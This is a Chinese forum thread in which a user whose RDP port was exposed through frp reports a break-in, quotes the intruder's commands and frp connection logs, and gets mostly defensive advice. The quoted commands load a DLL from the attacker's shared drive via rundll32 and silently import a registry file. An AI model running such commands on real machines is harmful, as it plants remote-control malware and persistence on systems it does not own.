这是一个创建于 749 天前的主题,其中的信息可能已经有所发展或是发生改变。
办公室有台没用的电脑,拿来刷网课。用 frp 打洞,直接开的 3389 端口,用 mstsc 远程控制。 才开了 2 天,就被人搞进来了,应该是弱口令的问题。
看到别人的操作记录
请问有人知道这是操作了什么不?
rundll32 \\tsclient\a\a.dll a
regedit /s \\tsclient\a\r.reg
frp 服务端日志
2022/10/27 06:17:01 [I] [proxy.go:162] [fcd53d7a449ce30e] [rdp] get a user connection [154.89.5.220:38210]
2022/10/27 06:17:01 [I] [proxy.go:162] [fcd53d7a449ce30e] [rdp] get a user connection [154.89.5.220:39680]
2022/10/27 06:17:02 [I] [proxy.go:162] [fcd53d7a449ce30e] [rdp] get a user connection [154.89.5.220:40964]
2022/10/27 06:17:03 [I] [proxy.go:162] [fcd53d7a449ce30e] [rdp] get a user connection [154.89.5.220:42406]
2022/10/27 06:17:03 [I] [proxy.go:162] [fcd53d7a449ce30e] [rdp] get a user connection [154.89.5.220:43746]
2022/10/27 06:17:04 [I] [proxy.go:162] [fcd53d7a449ce30e] [rdp] get a user connection [154.89.5.220:44924]
2022/10/27 06:17:05 [I] [proxy.go:162] [fcd53d7a449ce30e] [rdp] get a user connection [154.89.5.220:46104]
2022/10/27 06:17:05 [I] [proxy.go:162] [fcd53d7a449ce30e] [rdp] get a user connection [154.89.5.220:47126]
2022/10/27 06:17:06 [I] [proxy.go:162] [fcd53d7a449ce30e] [rdp] get a user connection [154.89.5.220:48130]
2022/10/27 06:17:07 [I] [proxy.go:162] [fcd53d7a449ce30e] [rdp] get a user connection [154.89.5.220:49162]
2022/10/27 06:38:56 [I] [proxy.go:162] [fcd53d7a449ce30e] [rdp] get a user connection [218.15.254.218:49298]
2022/10/27 06:48:35 [I] [proxy.go:162] [fcd53d7a449ce30e] [rdp] get a user connection [218.26.179.7:55213]
2022/10/27 06:55:41 [I] [proxy.go:162] [fcd53d7a449ce30e] [rdp] get a user connection [77.83.36.44:37643]
2022/10/27 06:55:41 [I] [proxy.go:162] [fcd53d7a449ce30e] [rdp] get a user connection [77.83.36.44:38109]
2022/10/27 07:04:11 [I] [proxy.go:162] [fcd53d7a449ce30e] [rdp] get a user connection [218.15.254.218:62334]
2022/10/27 07:12:42 [I] [proxy.go:162] [fcd53d7a449ce30e] [rdp] get a user connection [185.170.144.46:3172]
2022/10/27 07:13:48 [I] [proxy.go:162] [fcd53d7a449ce30e] [rdp] get a user connection [218.15.254.218:56728]
2022/10/27 07:16:39 [I] [control.go:309] [fcd53d7a449ce30e] control writer is closing
20 条回复 • 2022-10-28 18:27:54 +08:00
 |
1
7zlid 2022-10-27 12:49:41 +08:00 via Android
重装系统吧
|
 |
2
cndns 2022-10-27 13:02:35 +08:00
RDP 使用 3389 和 SSH 使用 22 的都是勇士
|
 |
4
kingpo 2022-10-27 13:07:02 +08:00
改下 3389 端口
|
 |
5
maskerTUI 2022-10-27 13:09:26 +08:00
弱口令才是真正的问题
|
 |
6
villivateur 2022-10-27 13:09:38 +08:00  1
@cndns 用标准端口没有任何问题,比如 SSH ,如果关闭密码登录,只允许 RSA 密钥登录,随便黑客怎样都不可能攻破
|
 |
7
flexbug 2022-10-27 13:09:55 +08:00 via iPhone
建议使用向日葵或者 todesk 不要自己创造风险
|
 |
8
mcluyu 2022-10-27 13:38:50 +08:00
默认用户名(或者容易猜到的常见用户名)+ 弱口令, 至于使用什么端口根本无所谓。
|
 |
9
vmebeh 2022-10-27 13:40:57 +08:00 via iPhone 1
套个 wireguard 回来随便用
|
 |
12
0x73346b757234 2022-10-27 17:58:31 +08:00
黑阔用 rundll32 白加黑的方式执行了一个恶意 dll 文件,猜测是远控木马。注册表加了个一个记录也许是做了持久化。
|
 |
13
kongkongye 2022-10-27 18:03:19 +08:00 via iPhone
我上次也是,用 frp 无密码暴露了 docker😂
|
 |
14
ungrown 2022-10-27 18:32:37 +08:00 via Android
@villivateur #6 rdp 也可以这样吗只允许密钥登录?
|
 |
15
zero47 2022-10-27 19:26:12 +08:00
之前用凉心云搭 transmission 远程下载,每次登上去都提示密码错误次数过多,要求重启。什么端口都没用,专门有人恶意扫端口的,还是好好加密比较重要。ssh 用 22 我觉得没问题,用证书加密就好。
|
 |
16
mmm159357456 2022-10-27 20:11:47 +08:00
rdp 可以上证书验证吗?
|
 |
17
swulling 2022-10-27 20:13:33 +08:00 via iPhone
不要暴露任何控制端口到公网
|
 |
18
aver4vex 2022-10-27 20:28:04 +08:00
我现在就是软路由开 wireguard 服务。随便折腾。
|
 |
19
PerFectTime 2022-10-28 10:33:52 +08:00
VPN 连回家最安全,商业公司的软件你也不知道里面有没有 0day
|
 |
20
HFX3389 2022-10-28 18:27:54 +08:00
frp 开 stcp 呗,不用普通的 tcp
|
Select Language